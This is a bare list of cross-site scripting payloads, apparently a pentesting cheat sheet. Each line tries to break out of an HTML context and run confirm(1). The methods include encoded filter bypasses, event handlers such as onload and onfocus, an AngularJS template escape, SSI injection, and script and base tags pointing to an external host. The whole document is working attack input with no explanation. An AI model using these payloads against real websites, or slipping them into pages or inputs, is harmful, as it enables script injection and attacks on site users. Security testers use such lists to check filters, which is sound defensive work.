'"--!><Script /K/Src=https:@knoxss.me/1>confirm%601%60</Script/K>
'"--!><Script /K/>confirm`1`</Script /K/>
"--!><Svg/Onload=confirm`1`>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm`1`>
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm`1` //
'"--!><Input /Autofocus /Onfocus=confirm`1` //
'" /Autof<K>ocus /O<K>nfocus=confirm`1` //
'"--!><Body /Onpageshow=confirm`1`>
'"--!><Svg><Set /Onbegin=confirm`1`>
"'--!><Html/Onmouseenter=confirm`1`//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm`1` //
'"--!><K /Onbeforescriptexecute=confirm`1` //
'"--!><Svg><Script /Xlink:Href=Data:,confirm`1` />
'"--!><Object /Data=JavaS%26%2399ript:confirm`1`>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@knoxss.me>
'"--!><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm`1`</K:script>
'"--!><K /Ng-App>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirm`1`,b")}}
'"--!><<!--%23set%20var="x"value="svg /o"var="y"value="nload=confirm`1`"--><!--%23echo%20var="x"var="y"-->>
